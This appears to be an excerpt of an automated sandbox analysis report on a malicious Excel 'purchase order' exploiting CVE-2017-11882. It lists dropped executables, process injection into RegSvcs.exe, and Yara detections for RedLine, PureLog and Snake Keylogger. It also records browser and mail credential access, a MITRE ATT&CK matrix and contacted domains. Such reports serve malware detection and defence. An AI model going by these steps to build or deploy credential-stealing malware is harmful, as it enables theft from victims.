5_2_00B70B62

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B309D5 SetUnhandledExceptionFilter,	5_2_00B309D5
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00B42622
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00B3083F
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00B30C21
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010109D5 SetUnhandledExceptionFilter,	8_2_010109D5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01022622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_01022622
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0101083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0101083F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01010C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_01010C21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013509D5 SetUnhandledExceptionFilter,	11_2_013509D5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_01362622
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0135083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0135083F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01350C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_01350C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008			Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe

8_2_01051201

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B52BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

5_2_00B52BA5

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0105B226 SendInput,keybd_event,

8_2_0105B226

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

5_2_00B922DA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\negrett.exe

5_2_00B70B62

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_01051663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

8_2_01051663

Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp, negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp, negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: name.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_3_029EFA98 cpuid

5_3_029EFA98

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

9_2_00417A20

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B4333F GetSystemTimeAsFileTime,

5_2_00B4333F

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0104D27A GetUserNameW,

8_2_0104D27A

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0102B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

8_2_0102B952

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior

Source: name.exe	Binary or memory string: WIN_81
Source: name.exe	Binary or memory string: WIN_XP
Source: name.exe.5.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: name.exe	Binary or memory string: WIN_XPe
Source: name.exe	Binary or memory string: WIN_VISTA
Source: name.exe	Binary or memory string: WIN_7
Source: name.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01071204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	8_2_01071204
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01071806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	8_2_01071806
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	11_2_013B1204
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	11_2_013B1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	211 Scripting	2 Valid Accounts	2 Native API	211 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Install Root Certificate	NTDS	27 System Information Discovery	Distributed Component Object Model	21 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Software Packing	LSA Secrets	13 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	131 Virtualization/Sandbox Evasion	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	212 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Orden de compra 0001-00255454.xlam.xlsx	56%	Virustotal		Browse
Orden de compra 0001-00255454.xlam.xlsx	68%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882
Orden de compra 0001-00255454.xlam.xlsx	100%	Avira	EXP/CVE-2017-11882.Gen

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\negrett.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\directory\name.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
baitalasma.com	4%	Virustotal	Browse
reallyfreegeoip.org	2%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
